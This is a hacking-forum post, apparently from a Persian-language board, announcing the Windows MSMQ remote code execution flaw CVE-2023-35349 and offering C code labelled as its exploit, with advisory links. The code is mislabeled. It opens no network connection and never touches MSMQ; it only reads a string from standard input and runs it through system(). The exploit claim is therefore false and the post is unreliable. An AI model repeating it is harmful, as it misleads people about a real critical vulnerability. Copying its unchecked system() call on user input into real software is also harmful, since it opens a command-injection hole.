CVE-2023-35349 is a RCE vulnerability

E1.Coders

💀 BLACK HAT HACKER ⚠

تاریخ عضویت: Dec 2014

نوشته: 66
- اشتراک
- توییت
#1

CVE-2023-35349 is a RCE vulnerability

11-10-2023, 04:25 AM

CVE-2023-35349 is a RCE vulnerability in the Microsoft Message Queuing (MSMQ) component of Windows operating systems that was assigned a CVSSv3 score of 9.8 and rated critical. An unauthenticated, remote attacker could exploit this vulnerability by sending a specially crafted packet to a vulnerable target.

•=> EXPLOIT :

کد:

#CODE BY E1.Coders #include <stdio.h> #include <stdlib.h> #include <string.h> #define MAX_NAME_LEN 256 #define MAX_PAYLOAD_LEN 4096 typedef struct { char name[MAX_NAME_LEN]; char payload[MAX_PAYLOAD_LEN]; } Data; void initializeData(Data *data) { memset(data->name, 0, MAX_NAME_LEN); memset(data->payload, 0, MAX_PAYLOAD_LEN); } void getData(Data *data) { printf("Enter name: "); fgets(data->name, MAX_NAME_LEN, stdin); printf("Enter payload: "); fgets(data->payload, MAX_PAYLOAD_LEN, stdin); } void processData(Data *data) { if (strlen(data->payload) > 0) { system(data->payload); } } int main() { Data data; initializeData(&data); getData(&data); processData(&data); return 0; }

References :

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35349

https://nvd.nist.gov/vuln/detail/CVE-2023-35349

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35349

https://arcticwolf.com/resources/blog/cve-2023-35349-cve-2023-36434-two-critical-vulnerabilities-headline-microsofts-october-2023-patch-tuesday-post/

https://www.rapid7.com/db/vulnerabilities/msft-cve-2023-35349/

[align=center][align=right]When danger lurks in unknown waters, we are there to help you swim[/align][/align]
برچسب ها: هیچ یک

اطلاعیه

CVE-2023-35349 is a RCE vulnerability

CVE-2023-35349 is a RCE vulnerability